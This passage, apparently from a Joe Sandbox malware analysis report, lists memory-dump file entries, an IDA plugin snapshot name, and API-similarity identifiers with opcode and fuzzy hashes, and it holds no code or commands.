                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: c56c64a5c5d4d393727c562f262a8125da2915752b29172271d3e5f69d15b3db
                              • Instruction ID: 26d5e1ef038fb0116e6fe98caf249280953e9afec83c5283f4c722e4bd46b076
                              • Opcode Fuzzy Hash: c56c64a5c5d4d393727c562f262a8125da2915752b29172271d3e5f69d15b3db
                              • Instruction Fuzzy Hash: 2A21B8BA90020867C754F7B0DC56FF9333DA754304F00454EB65D96191EEB896C8CBA6